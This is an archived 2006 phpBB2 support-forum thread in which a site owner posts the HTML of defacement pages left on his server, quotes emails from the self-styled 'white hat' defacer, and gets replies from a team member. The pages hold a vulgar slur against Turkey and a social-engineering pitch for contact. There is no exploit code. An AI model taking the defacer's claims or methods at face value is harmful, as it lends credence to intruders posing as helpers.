"white Hat" defacing

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
Forum rules
Following phpBB2's EoL, this forum is now archived for reference purposes only.
Please see the following announcement for more information: viewtopic.php?f=14&t=1385785
Locked
stardotstar
Registered User
Posts: 70
Joined: Fri Aug 01, 2003 2:07 am
Location: Brisbane, Australia
Contact:

"white Hat" defacing

Post by stardotstar » Sun Jun 18, 2006 7:12 am

Probably my bad - permissions or something but I have just finished cleaning up after a guy who claims that his exploit is as a result of not having an up to date phpBB - I am running 2021 but I have lots of mods and am not a security guru anyway... Just in case this means anything to anyone here I am pasting the html that was injected to my www root (debian/apache2) seemingly from a compromise in the www-data account - I don't know where or how yet.

Code: Select all

helios:/var/backups# cat blackmind.html
<html>
<title>Hacked by mr.BlackMind [Digital_Circus Group] [DCG]</title>
<center>
<img src='http://img182.imageshack.us/img182/1858/avatar512x3846ml.jpg' />

<br>
Hacked by mr.BlackMind </center>

Code: Select all

</html>helios:/var/backups# cat index.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Untitled Document</title>
<style type="text/css">
<!--
.style1 {
        color: #E90158;
        font-weight: bold;
}
-->
</style>
</head>

<embed src="a.mp3" hidden=true autostart=true>
<noembed>
<bgsound src="a.mp3">
</noembed>

<body>
<p>ADMIN SORRY.I AM NOT BAD HACKER!I WANT JUST TO INFORM YOU THAT THE PHPBB2 YOU HAVE IS VULNERABLE TO REMOTE FILE INCLUSION.PLEASE UPDATE IT. IF YOU WANT MORE HELP CONTACT WITH ME AT skatanafate@freemail.gr </p>
<p>HI. MY MAM IS THE GYPRUS AND MY FATHER THE GREECE hahahaha.</p>
<p>THEY DO ME AND I FUCK TURKEY :D</p>
<p>I SUGGEST TO OPEN THIS HTML WITH INTERNET EXPLORER.OPEN IT WITH FIREFOX ONLY IF YOU HAVE QUIQ TIME ;) </p>
<p class="style1"><a href="http://www.archeli.com.au/phpBB2">FORUM</a></p>
<p><img src="http://www.geocities.com/xplanet2005/GR3_CY.JPG" width="338" height="560" /> </p>
<p>now listen a song.A GREEK SONG!! GREEK SIRTAKI :) (an old song...with BOUZOUKI instrument) :D</p>
<p>&nbsp;</p>
<p>PLEASE UPDATE YOUR VERSION!</p>
<p>&nbsp;</p>
<p>peace...</p>
<p>&nbsp;</p>
<p>not bad hacker!I want just to inform you!! :D   </p>
</body>
</html>
helios:/var/backups#
For reasons I can't fathom I didn't notice the problem till it was reported by an MSIE user - firefox was not affected.

Further problems appear to be associated with this attack - I have some worrying logs but I won't post them here becasue this post may be in the wrong place or something.

I did google this html but found no other reference to this crack.
\x!\\_

stardotstar
Registered User
Posts: 70
Joined: Fri Aug 01, 2003 2:07 am
Location: Brisbane, Australia
Contact:

Post by stardotstar » Sun Jun 18, 2006 10:50 am

This guy has registered on my site before the defacing and just now emailed me from the board:
gr3_cy wrote: Message sent to you follows
~~~~~~~~~~~~~~~~~~~~~~~~~~~

hi your site is vulnerable.I saw that when i visit now this
http://www.archeli.com.au/ don't open the phpBB2...you have to put a script there to
redirect to phpBB2..
make a txt and copy paste this into the txt

<?php
header("location:/phpBB2");
?>


now change the txt to php and give a name index

so the new file will be index.php now upload it in thw folder where i upload my
html and now this php will redirect the http://www.archeli.com.au/ to
http://www.archeli.com.au/phpBB2

this you want ? :) i told you this because now when you visit
http://www.archeli.com.au/ it does not open the phpBB2 ;) do this i say ;) but
your server is steal vulnerable!!THIS IS JUST TO REDIRECT!!

for any problem add me to your msn gr3_cy@hotmail.com or mail me at
skatanafate@freemail.gr


gr3_cy wrote: Message sent to you follows
~~~~~~~~~~~~~~~~~~~~~~~~~~~

because can't copy patse php script you didn't get all the php script from the
previus email..ad me to your msn gr3_cy@hotmail.com to give it to you from there..


I take it that this is all because of my www root security and not an exploit in phpBB2 or this would be a known problem that is fixed??

I have revised all permissions and ownership in www root and below and hope that this resolves the security issue. I have had no personal correspondance with this cracker at all. I note that the site is operating normally now in MSIE and Firefox.
\x!\\_

User avatar
karlsemple
Former Team Member
Posts: 39802
Joined: Mon Nov 01, 2004 8:54 am
Location: Hereford, UK
Contact:

Post by karlsemple » Sun Jun 18, 2006 10:52 am

just out of interest what mods do you have installed on the board?
Image

stardotstar
Registered User
Posts: 70
Joined: Fri Aug 01, 2003 2:07 am
Location: Brisbane, Australia
Contact:

Post by stardotstar » Sun Jun 18, 2006 11:26 am

Lots, its liklie to be associated with the auction mod which I have not been using but now completely disabled - PCP, APM, Banners, topics on index, announcements, and on and on.

As I say I don't think this is actually a phpBB problem so much as security on my server but I just wanted something to be on phpbb.com to record the exact nature of the defacing.
\x!\\_

User avatar
karlsemple
Former Team Member
Posts: 39802
Joined: Mon Nov 01, 2004 8:54 am
Location: Hereford, UK
Contact:

Post by karlsemple » Sun Jun 18, 2006 11:28 am

stardotstar wrote: Lots, its liklie to be associated with the auction mod which I have not been using but now completely disabled - PCP, APM, Banners, topics on index, announcements, and on and on.

As I say I don't think this is actually a phpBB problem so much as security on my server but I just wanted something to be on phpbb.com to record the exact nature of the defacing.



you should have really posted this to the IIT http://www.phpbb.com/support/incidents/
Image

Locked

Return to “2.0.x Support Forum”